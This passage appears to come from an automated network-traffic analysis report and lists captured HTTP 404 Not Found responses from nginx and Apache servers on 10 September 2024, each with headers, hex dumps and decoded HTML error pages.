  Data Ascii: chHT=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqpqMqQIk1GqXvtdX2w8u6Kiac2+5HvXeoQ==
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Tue, 10 Sep 2024 06:48:13 GMT
  Content-Type: text/html
  Content-Length: 138
  Connection: close
  ETag: "6663edd0-8a"
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 10 Sep 2024 06:48:29 GMT
  Server: Apache
  Content-Length: 196
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 10 Sep 2024 06:48:31 GMT
  Server: Apache
  Content-Length: 196
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 10 Sep 2024 06:48:34 GMT
  Server: Apache
  Content-Length: 196
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:48:36 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:48:51 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:48:53 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:48:56 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:48:56 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:48:58 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a8e223-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic
            HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Server: nginx/1.14.1
            Date: Tue, 10 Sep 2024 06:49:12 GMT
            Content-Length: 0
            Connection: close
            X-Rate-Limit-Limit: 5s
            X-Rate-Limit-Remaining: 19
            X-Rate-Limit-Reset: 2024-09-10T06:49:17.6317063Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:49:32 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:49:35 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:49:37 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Sep 2024 06:49:40 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" 
href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:49:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Sep 2024 06:49:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
